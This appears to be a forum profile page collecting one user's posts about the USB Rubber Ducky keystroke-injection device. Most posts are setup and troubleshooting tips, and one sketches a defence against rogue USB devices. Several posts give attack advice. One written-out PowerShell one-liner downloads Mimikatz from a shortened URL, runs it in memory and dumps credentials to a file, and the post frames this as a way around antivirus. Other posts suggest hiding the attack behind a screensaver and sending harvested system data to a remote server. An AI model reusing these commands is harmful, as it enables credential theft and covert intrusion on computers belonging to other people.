Jump to content

MB60893

Active Members
  • Posts

    205
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by MB60893

  1. OK. Firstly for you to be able to run the encoder on an Android device, you would need to modify the code to comply with the Android Architecture. By default android is actually Java-based, so you can develop the encoder in a similar way, only you would need to modify the application to work with Android. As for multiple platforms, well, I think Java is closest to C in the respect that it is supported by so many operating systems. I know what you mean, though. Java is tragically slow in comparison, as it is partially interpreted as well as compiled. If it was compiled, it would be much quicker (while the notice to us mere mortals would be very small) and I believe a C compiled version would be much better as well. I don't do C code specifically, but I know it would be much better. Good Luck.
  2. Most certainly. I would learn all about the ducky, and then I would try and modify it from there.
  3. Hmm. Unless you were to physically solder some wires onto the connection, then IDK, you might be able to do some other hacking of the Ducky. Just try not to kill the ducky! 8-)
  4. Tried it on my Wii at one point. Skipped a few characters, but did work nonetheless.
  5. There is some firmware where you can press Caps Lock or something and it will give you an option to choose multiple payloads off your ducky.
  6. I know that HowToGeeks have a post about a Keyboard Locker made in AutoHotKey. It works fantastically. As for a mouse stopper, well, I know there are features like this for Laptops, so have a look around, I know you'll be able to find something.
  7. I seriously think that the reason people's ducky's don't work is because the SD Cards need to be formatted. My ducky didn't work the first time, but what I did was simply format the SD Card, try using the Duck Toolkit made by 411, and also use different SD cards in the first place. Make sure the driver for the ducky installs on your computer first. Then try the ducky.
  8. You could also just look for the process mssecess.exe and kill the instance of that. Surprisingly, the process isn't persistent like Windows Update is.
  9. This seems to be a common problem. Speak with one of the ducky moderators.
  10. You can just get a case that has a bigger hole. They are scattered across the internet.
  11. I think the best way is to cover your actions by bringing up a screensaver while things execute. It tales 10 seconds, and nothing will be shown providing you don't touch the mouse. Have a look across the forums. Cheers, MB60893.
  12. You can simply use the USB OTG adapter. Using something like DroidEdit, you can create a script, then save it as a .txt file. I don't know if you can upload files or not, but you could possibly find a file manager, and copy the script into 411's Duck Toolkit. You can then download the .bin file, transfer that to the SD Card, and use the USB Rubber Ducky as per normal.
  13. Hi, Sorry it took me so long to reply. I love what you have done with this, and you have obviously given it a lot of thought. I have just written a simple script and I find that it has worked quite well. I will have to look into the things you've added, like the REPEAT function. Great Job! MB60893.
  14. What I would do is simply ask my friend to order it for me, pay them (possibly with a bit of a larger tip) and I would be able to hack to my hearts content!
  15. Firstly, when you refer to "Bypass" UAC, what you are really saying is don't bring up the dialog box saying "Do you want to run xyz program as Administrator?". What I think would be better is to get administrator rights from a guest users' perspective, just about guaranteeing that any program would work if you needed to execute it. If I knew someone who was an administrator, I would simply write a ducky script using the CTRL-SHIFT-ENTER command to elevate Powershell, then use the "Invoke-Mimikatz" command with "-DumpCreds". This would output the administrator password for the computer (providing it is not a Windows 8/8.1 machine). I know there is a way you can execute a task as another user... so if you knew the administrator password for a computer, you could simply rock up as a guest, and run the task as an admin user. Thoughts?
  16. Have a look at the duck slurp post. This detects when the USB Flash Drive is plugged in. Also, look into Powershell, NOT cmd. Much better for the ducky.
  17. I see one serious problem with these scripts, and that is you are effectively downloading Mimikatz to the target machine and executing it. Mimikatz is easily set off by an AV, such as Microsoft Security Essentials. I find that the best way of using Mimikatz is using this powershell script: powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" >> %USERPROFILE%\creds.txt This script checks for the correct architecture of the PC's system, then downloads the correct .dll file needed for the execution of Mimikatz. Much cleaner than having to download and store the Mimikatz .exe file.
  18. Nice! This is one script that I don't want to accidentally test on my main PC!
  19. You can just do something called a "Duck Slurp". Search it on the Hak5 Forums and you will find out about the copying of files ONTO a USB. Just simply reverse the code and you can transfer files TO the PC. I personally love the WGET and Execute script. Search through one of my previous posts. I detail a lot about that script. Cheers, MB60893.
  20. Also try CTRL ESC This opens the Start Menu. Sometimes you need to type GUI or MENU to open the Start Menu. I like CTRL ESC though because I know it works universally.
  21. DELAY 3000 GUI d DELAY 500 PRINTSCREEN DELAY 100 MENU DELAY 300 STRING V DELAY 40 STRING D DELAY 300 GUI r DELAY 700 STRING mspaint ENTER DELAY 1200 CTRL v DELAY 500 CTRL s DELAY 1000 STRING %userprofile%\a.bmp ENTER DELAY 500 ALT f DELAY 400 STRING K DELAY 100 STRING F DELAY 1000 ALT F4 DELAY 300 GUI d This was on the USB Rubber Ducky GitHub Page. Downloading a picture just requires a WGet and Execute. I'll write one when I have more time.
  22. The best way I can think of to defend against a ducky attack would be to have a piece of software constantly monitoring what devices are plugged into the computer. The idea is that you effectively create a filtering program that detects the devices and checks for a unique address. Kind of like MAC Address filtering on wireless routers etc. As well as this, you could possibly deny any devices plugged into a USB port before they can be mounted onto the computer as a hard disk, keyboard etc. I know that ages ago there was a leak of Microsoft COFEE and that some developers created an application called DECAF, which looked for traces on USB's, CD's etc. for the trace signatures of COFEE. My idea is that you could create something like this which speculates against all USB devices, and unless you enter in the correct password, you can't use a USB device. Let me know what you think.
  23. You can use the Duck Toolkit (http://www.ducktoolkit.com/Home.jsp) to create a powershell script to determine what OS it is. All results will be published into an html file with tables etc. The file will then be sent to an email account or to a remote server. Play around on your own computer and you will be able to get an idea of what it will do.
×
×
  • Create New...